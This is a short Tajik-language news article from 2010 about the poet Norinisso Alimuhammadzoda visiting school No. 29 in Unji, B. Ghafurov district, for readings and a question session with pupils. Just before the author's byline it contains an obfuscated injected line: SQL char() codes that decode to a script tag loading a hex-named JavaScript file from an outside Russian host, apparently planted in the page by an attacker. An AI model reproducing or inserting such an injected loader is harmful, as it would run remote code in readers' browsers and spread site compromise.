24.05.2010
Мулоқот
Дар мактаби таҳсилоти миёнаи умумии рақами 29-и ҷамоати Унҷи н. Б. Ғафуров мулоқот бо шоира Норинисо Алимуҳаммадзода баргузор гардид.
Хонандагони мактаб шоираро бо шеъру гулдастаҳо пешвоз гирифтанд.
Мулоқоти шоира бо шогирдону омӯзгорони мактаб хеле самими ва гарму ҷӯшон гузашт. Сарвари мактаб Норинисо Ҷамолова сухани ифтитоҳи карда ҳамагонро ба ин мактаб хайрамақдам гуфт. Хонандагон бошанд дар бораи ҳаёту фаъолияти шоира баромад намуда аз ашъори шоираи маҳбуб Норинисо шеърҳо қироат карданд.
Сармуҳаррири рӯзномаи мактаббаччагони ноҳия «Роҳбари дониш» Ӯғулой Қоситова дар бораи хусусиятҳои ашъори шоира ҳарф зад. Шоира Норинисо аз рӯзгори гузаштаву имрӯза ва эҷодиёти хеш сухан гуфта, чанд шеърҳои тоза эҷоди худро баҳри ҳозирин қироат намуд.
Боиси қайд аст, ки шоира Норинисо бори дуввум аст, ки ба ин мактаб ташриф меорад. Сафари аввалини ӯ ба ин мактаб соли 1985 бо нависандаи халқии Тоҷикистон устод Раҳим Ҷалил сурат гирифта буд. Кормади шӯъбаи масоили иҷтимоии фарҳангии мақомоти иҷроияи ҳокимияти давлатии вилоят Турсуной Дадобоева бори дигар шоираро ба суғдзамин зодгоҳи адиба хайрамақдам гуфт.
Яке аз дӯстони шоира Норинисо Муаттара Ғаниева ба сухан баромада хотираҳои худро дар бораи дӯстии худ ва шоира нақл намуд. Дар вохӯри байни хонандагон ва шоира саволу ҷавобҳо доир гардид. Ҳамчунин чанд нафар толибилмони навқалам шеърҳои худро қироат намуданд ва шоира ба шогирдону омӯзгорони мактаб чанд номгӯи ашъори худро ҳадя намуд. Дар охир бошад маҳфил хубу хотирмон анҷом ёфт.
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)c9c956d6abc11d2a7776e56e86a7503a.js" type="text/javascript">

Эшқул Файзуллоев